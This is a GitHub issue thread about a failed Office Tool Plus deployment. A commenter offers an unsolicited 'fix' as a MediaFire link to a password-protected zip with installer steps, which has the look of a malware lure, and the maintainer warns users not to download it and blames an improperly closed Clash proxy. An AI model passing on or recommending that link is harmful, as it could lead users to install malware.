### ISSUE TITLE
[BUG] officetoolplus部署失败

### ISSUE THREAD

**Issue by Zhangdata** [YerongAI/Office-Tool#875]
![84dc0d8f-9d01-489c-b26c-74ee392ca7fd](https://github.com/user-attachments/assets/ba310acf-e96a-43c0-a9e0-7fc1877ea7df)

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zhangdata** [comment]
目前我知道解决方法是系统变量的问题，不知道是不是，但是问题已经解决了

**Comment by YerongAI** [comment]
> 目前我知道解决方法是系统变量的问题，不知道是不是，但是问题已经解决了

这种东西一看就知道是 Clash 出问题了，上次没正常关闭。

还有，不要下载楼上的文件。
